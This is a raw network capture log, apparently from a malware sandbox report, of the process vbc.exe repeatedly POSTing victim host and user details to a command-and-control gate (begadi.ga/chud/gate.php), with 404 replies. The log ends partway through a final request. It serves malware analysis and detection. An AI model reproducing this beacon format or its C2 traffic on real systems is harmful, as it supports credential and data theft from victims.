Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49175	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:35.934755087 CET	626	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:35.992665052 CET	626	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:36.116868019 CET	626	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.22	49247	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:12.410320997 CET	724	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:12.469660997 CET	725	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:12.596600056 CET	725	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.22	49248	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:12.859761000 CET	726	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:12.917004108 CET	726	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:13.045886040 CET	726	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.22	49249	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:15.289894104 CET	727	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:15.347448111 CET	727	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:15.471556902 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.22	49250	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:15.721699953 CET	729	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:15.780733109 CET	729	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:15.909936905 CET	729	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.22	49251	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:16.167680979 CET	730	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:16.230355024 CET	730	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:16.356204033 CET	731	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.22	49252	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:16.612814903 CET	731	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:16.670310020 CET	732	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:16.795536041 CET	732	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.22	49253	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:17.056103945 CET	733	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:17.113158941 CET	733	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:17.290443897 CET	733	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.22	49254	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:17.553276062 CET	734	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:17.616457939 CET	734	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:17.746176958 CET	735	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.22	49255	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:18.009480953 CET	735	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:18.067792892 CET	736	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:18.197958946 CET	736	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.22	49256	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:18.454350948 CET	737	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:18.515912056 CET	737	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:18.645733118 CET	737	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49176	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:36.417718887 CET	627	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:36.481360912 CET	627	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:36.615479946 CET	628	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.22	49257	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:18.916194916 CET	738	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:18.976077080 CET	738	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:19.103234053 CET	739	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.22	49258	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:19.360780001 CET	740	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:19.418118954 CET	740	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:19.537756920 CET	740	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.22	49259	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:19.810534000 CET	741	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:19.873673916 CET	741	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:20.007169008 CET	742	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.22	49260	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:20.265619993 CET	742	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:20.324187994 CET	743	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:20.447706938 CET	743	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.22	49261	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:20.716352940 CET	744	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:20.778178930 CET	744	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:20.916419983 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.22	49262	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:21.162199020 CET	745	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:21.221807003 CET	745	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:21.349723101 CET	746	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.22	49263	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:21.617247105 CET	746	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:21.680282116 CET	747	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:21.806761026 CET	747	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.22	49264	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:22.049658060 CET	748	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:22.108139038 CET	748	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:22.237977028 CET	748	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.22	49265	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:22.498814106 CET	749	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:22.555979967 CET	749	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:22.684315920 CET	750	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.22	49266	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:22.936532021 CET	751	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
